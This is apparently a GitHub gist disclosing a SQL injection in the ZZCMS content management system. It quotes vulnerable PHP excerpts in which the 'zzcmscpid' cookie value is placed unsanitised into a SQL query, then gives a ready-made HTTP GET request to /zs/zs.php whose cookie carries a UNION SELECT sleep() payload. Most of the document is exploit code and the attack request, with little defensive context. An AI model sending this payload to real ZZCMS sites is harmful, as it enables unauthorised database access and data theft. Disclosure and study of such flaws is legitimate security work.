Skip to content

Instantly share code, notes, and snippets.

Created August 24, 2018 12:13
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
ZZCMS sqlinject

ZZCMS sqlinject

PoC by Lz1y

ZZCMS the lastest version download page :

zip installer:

vulnerability code:

in file zs/subzs.php line 1-24:

function showcookiezs($cs){
$cs=explode(",",$cs); //传入的$cs是一个整体字符串,转成数组
if (!isset($_COOKIE["zzcmscpid"])){
if (strpos($cpid,",")>0){
$cpid=str_replace(" ","",$cpid);
$sql="select id,proname,img from zzcms_main where id in (".$cpid.")";
$sql="select id,proname,img from zzcms_main where id='$cpid' ";

in file labels.php line 57-73,function fixed:

function fixed($cs,$channel){
switch ($channel){
case 'ad':return showad($cs); break;
case 'zs':return showzs($cs); break;
case 'dl':return showdl($cs); break;
case 'pp':return showpp($cs); break;
case 'job':return showjob($cs); break;
case 'zx':return showzx($cs); break;
case 'zh':return showzh($cs); break;
case 'announce':return showannounce($cs); break;
case 'cookiezs':return showcookiezs($cs); break;
case 'zsclass':return showzsclass($cs); break;
case 'keyword':return showkeyword($cs); break;
case 'province':return showprovince($cs); break;
case 'sitecount':return showsitecount($cs); break;

in file labels.php line 1-16:

function showlabel($str){
global $b;//zsshow需要从zs/class.php获取$b;zxshow从s/class.php获取$b;
foreach ($channels as $value) {
if (strpos($str,"{#show".$value.":")!==false){
for ($i=1;$i<$n;$i++){
if ($cs<>''){$str=str_replace("{#show".$value.":".$cs."}",fixed($cs,$value),$str);} //$cs直接做为一个整体字符串参数传入,调用时再转成数组遍历每项值

in file zs/zs.php line 342:


line 204-207:

$f = fopen($fp,'r');
$strout = fread($f,filesize($fp));

in file template/red13/zs.htm:

<div class="content1">{#showcookiezs:3,60,60}</div>


GET /zs/zs.php HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UserName=admin; zzcmscpid=1)%0aunion%0aselect%0asleep(0),2,3#,12); PHPSESSID=82cd4ed33d175f6a22d2ceeaf7f10e93;
Connection: close



Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment